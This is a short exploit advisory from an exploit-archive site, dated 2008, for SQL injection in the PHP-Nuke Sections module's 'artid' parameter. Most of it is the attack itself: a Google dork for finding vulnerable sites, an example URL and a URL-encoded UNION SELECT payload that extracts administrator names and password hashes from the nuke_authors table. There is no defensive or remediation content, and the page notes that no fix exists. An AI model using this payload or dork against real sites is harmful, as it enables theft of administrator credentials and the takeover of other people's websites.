PHP-Nuke Module Sections (artid) Remote SQL Injection Vulnerability
2008-02-19 00:00:00###############################################################
#
# PHP-Nuke Module Sections SQL Injection(artid)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAÄ°L : [email protected]
#
################################################################
#
# DORK 1 : allinurl: "name Sections op viewarticle artid"
#
################################################################
example
www.xxX/xxxxSections&op=viewarticle&artid=(exploit)
EXPLOIT :
-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################
#
Fixes
No fixesIn order to submit a new fix you need to be registered.